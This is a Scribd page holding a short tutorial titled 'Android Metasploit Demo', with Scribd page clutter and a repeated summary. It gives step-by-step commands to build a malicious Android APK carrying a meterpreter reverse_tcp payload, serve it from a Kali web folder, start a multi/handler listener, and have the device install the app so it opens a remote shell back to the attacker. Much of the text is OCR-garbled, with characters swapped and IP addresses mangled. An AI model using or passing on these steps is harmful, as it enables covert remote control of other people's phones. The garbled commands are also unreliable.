1. Generate a Metasploit payload for Android and transfer the app.apk file to the device without installing it.
2. Start Metasploit on Kali and set up a listener using the multi/handler exploit with the android/meterpreter/reverse_tcp payload and the Kali IP and port.
3. Install the app.apk on the Android device to trigger a meterpreter session back to Kali.
Download as DOC, PDF, TXT or read online on Scribd
0 ratings0% found this document useful (0 votes)
150 views
Android Metasploit Demo
1. Generate a Metasploit payload for Android and transfer the app.apk file to the device without installing it.
2. Start Metasploit on Kali and set up a listener using the multi/handler exploit with the android/meterpreter/reverse_tcp payload and the Kali IP and port.
3. Install the app.apk on the Android device to trigger a meterpreter session back to Kali.
Download as DOC, PDF, TXT or read online on Scribd
You are on page 1/ 3
1.
In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.16.1.16 L!O"T=#### " $ app.ap% replace LHOST with your kali box ip . tran!"er the app.apk to your android de#ice, $u!t download in the android de#ice !o not in!tall. %or tran!"erin& the app.apk you can create !hared "older in kali'! location, (#ar(www( , you need to !tart apache !er#ice, copy the app.apk to thi! "older and brow!e thi! location in androide de#ice. ). In Kali, !tart *eta!ploit "rom the menu or by typin& +m!"con!ole, in a Terminal window. -. Once *eta!ploit !tart!, type in the "ollowin& to create a li!tener: u!e exploit(multi(handler !et payload android(meterpreter(re#er!e.tcp !et lho!t 1/.101.1.10 2enter your Kali I3 addre!!4 !et lport ---- exploit once the payload handler i! ready, &o to the android de#ice and in!tall the app.apk, a"ter in!tallation open the application. 5ou can !ee a meterpreter !e!!ion !tarted. 3lea!e re"er the below !creen !hot!...